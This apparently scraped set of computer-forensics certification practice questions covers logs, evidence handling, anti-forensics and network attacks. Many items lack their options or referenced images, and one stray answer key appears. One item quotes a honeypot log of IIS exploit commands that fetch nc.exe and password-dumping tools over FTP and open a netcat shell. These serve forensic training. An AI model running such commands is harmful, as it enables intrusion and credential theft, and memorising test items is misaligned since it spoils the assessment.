Which network attack is described by the following statement? "At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries."
Which program is the bootloader when Windows XP starts up?
During an investigation, an employee was found to have deleted harassing emails that were sent to someone else. The company was using Microsoft Exchange and had message tracking enabled. Where could the investigator search to find the message tracking log file on the Exchange server?
Which tool does the investigator use to extract artifacts left by Google Drive on the system?
Which password cracking technique uses details such as length of password, character sets used to construct the password, etc.?
All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism?
Which of the following commands shows you the names of all open shared files on a server and the number of file locks on each file?
Netstat is a tool for collecting information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?
Which network attack is described by the following statement?
“At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.”
What method of copying should always be performed first before carrying out an investigation?
Cylie is investigating a network breach at a state organization in Florida. She discovers that the intruders were able to gain access into the company firewalls by overloading them with IP packets. Cylie then discovers through her investigation that the intruders hacked into the company phone system and used the hard drives on their PBX system to store shared music files. What would this attack on the company PBX system be called?
When using an iPod and the host computer is running Windows, what file system will be used?
When investigating a wireless attack, what information can be obtained from the DHCP logs?
Which of the following tool creates a bit-by-bit image of an evidence media?
Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ?
What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture?
Bob has encountered a system crash and has lost vital data stored on the hard drive of his Windows computer. He has no cloud storage or backup hard drives. he wants to recover all those data, which includes his personal photos, music, documents, videos, official email, etc. Which of the following tools shall resolve Bob’s purpose?
What encryption technology is used on Blackberry devices Password Keeper?
Linux operating system has two types of typical bootloaders namely LILO (Linux Loader) and GRUB (Grand Unified Bootloader). In which stage of the booting process do the bootloaders become active?
A forensics investigator is searching the hard drive of a computer for files that were recently moved to the Recycle Bin. He searches for files in C:\RECYCLED using a command line tool but does not find anything. What is the reason for this?
A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?
Which MySQL log file contains information on server start and stop?
Amber, a black hat hacker, has embedded a malware into a small enticing advertisement and posted it on a popular ad-network that displays across various websites. What is she doing?
When needing to search for a website that is no longer present on the Internet today but was online few years back, what site can be used to view the website collection of pages?
Who is responsible for the following tasks?
Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away.
Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue with his home wireless network?
Bob works as information security analyst for a big finance company. One day, the anomaly-based intrusion detection system alerted that a volumetric DDOS targeting the main IP of the main web server was occurring. What kind of attack is it?
Where is the startup configuration located on a router?
What type of analysis helps to identify the time and sequence of events in an investigation?
Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?
Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
While collecting Active Transaction Logs using SQL Server Management Studio, the query Select * from ::fn_dblog(NULL, NULL) displays the active portion of the transaction log file. Here, assigning NULL values implies?
What malware analysis operation can the investigator perform using the jv16 tool?
Which of the following Windows-based tool displays who is logged onto a computer, either locally or remotely?
You are a Penetration Tester and are assigned to scan a server. You need to use a scanning technique wherein the TCP Header is split into many packets so that it becomes difficult to detect what the packets are meant for. Which of the below scanning technique will you use?
Which of the following is NOT an anti-forensics technique?
Which of the following is NOT an anti-forensics technique?
What is the framework used for application development for iOS-based mobile devices?
Which of the following is a responsibility of the first responder?
Which of the following protocols allows non-ASCII files, such as video, graphics, and audio, to be sent through the email messages?
Shane, a forensic specialist, is investigating an ongoing attack on a MySQL database server hosted on a Windows machine with SID “WIN-ABCDE12345F.” Which of the following log file will help Shane in tracking all the client connections and activities performed on the database server?
Which tool allows dumping the contents of process memory without stopping the process?
Jim’s company regularly performs backups of their critical servers. But the company can’t afford to send backup tapes to an off-site vendor for long term storage and archiving. Instead Jim’s company keeps the backup tapes in a safe in the office. Jim’s company is audited each year, and the results from this year’s audit show a risk because backup tapes aren’t stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit?
What does the bytes 0x0B-0x53 represent in the boot sector of NTFS volume on Windows 2000?
An attacker has compromised a cloud environment of a company and used the employee information to perform an identity theft attack. Which type of attack is this?
In a Linux-based system, what does the command “Last -F” display?
Which list contains the most recent actions performed by a Windows User?
In Linux OS, different log files hold different information, which help the investigators to analyze various issues during a security incident. What information can the investigators obtain from the log file
What is an investigator looking for in the rp.log file stored in a system running on Windows 10 operating system?
Which command can provide the investigators with details of all the loaded modules on a Linux-based system?
CAN-SPAM act requires that you:
Which principle states that “anyone or anything, entering a crime scene takes something of the scene with them, and leaves something of themselves behind when they leave”?
Which of the following tools is not a data acquisition hardware tool?
Which Event Correlation approach assumes and predicts what an attacker can do next after the attack by studying statistics and probability?
Graphics Interchange Format (GIF) is a ____ RGB bitmap image format for images with up to 256 distinct colors per frame.
Ron, a computer forensics expert, is investigating a case involving corporate espionage. He has recovered several mobile computing devices from the crime scene. One of the evidence that Ron possesses is a mobile phone from Nokia that was left in ON condition. Ron needs to recover the IMEI number of the device to establish the identity of the device owner. Which of the following key combinations can he use to recover the IMEI number?
Which of the following techniques delete the files permanently?
What is the investigator trying to analyze if the system gives the following image as output?
What do you call the process in which an attacker uses magnetic field over the digital media device to delete any previously stored data?
Smith is an IT technician that has been appointed to his company's network vulnerability assessment team. He is the only IT employee on the team. The other team members include employees from
Accounting, Management, Shipping, and Marketing. Smith and the team members are having their first meeting to discuss how they will proceed. What is the first step they should do to create the network
vulnerability assessment plan?
Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces. What could have prevented this information from being stolen from the laptops?
An Expert witness give an opinion if:
What is the following command trying to accomplish?
You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printer out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _________________________ in order to track the emails back to the suspect.
When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position of the filename in the FAT database.
What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?
Which part of the Windows Registry contains the user's password file?
Lance wants to place a honeypot on his network. Which of the following would be your recommendations?
You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?
When investigating a Windows System, it is important to view the contents of the page or swap file because:
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 22.214.171.124. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 126.96.36.199 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
Software firewalls work at which layer of the OSI model?
When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:
George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network.
What filter should George use in Ethereal?
You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?
The offset in a hexadecimal code is:
Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately.
Which organization coordinates computer crimes investigations throughout the United States?
After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?
In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?
Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?
What does the superblock in Linux define?
Which of the following should a computer forensics lab used for investigations have?
When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:
Study the log given below and answer the following question:
Apr 24 14:46:46 : spp_portscan: portscan detected from 188.8.131.52
Apr 24 14:46:46 : IDS27/FIN Scan: 184.108.40.206:56693 -> 172.16.1.107:482
Apr 24 18:01:05 : IDS/DNS-version-query: 220.127.116.11:3485 -> 172.16.1.107:53
Apr 24 19:04:01 : IDS213/ftp-passwd-retrieval: 18.104.22.168:1425 -> 172.16.1.107:21
Apr 25 08:02:41 : spp_portscan: PORTSCAN DETECTED from 22.214.171.124
Apr 25 02:08:07 : IDS277/DNS-version-query: 126.96.36.199:4499 -> 172.16.1.107:53
Apr 25 02:08:07 : IDS277/DNS-version-query: 188.8.131.52:4630 -> 172.16.1.101:53
Apr 25 02:38:17 : IDS/RPC-rpcinfo-query: 184.108.40.206:642 -> 172.16.1.107:111
Apr 25 19:37:32 : IDS230/web-cgi-space-wildcard: 220.127.116.11:4221 -> 172.16.1.107:80
Apr 26 05:45:12 : IDS212/dns-zone-transfer: 18.104.22.168:2291 -> 172.16.1.101:53
Apr 26 06:43:05 : IDS181/nops-x86: 22.214.171.124:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 : IDS175/socks-probe: 126.96.36.199:20 -> 172.16.1.107:1080
Apr 26 06:52:10 : IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 188.8.131.52:4558
Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate?
Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do write themselves to the hard drive, if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?
When cataloging digital evidence, the primary goal is to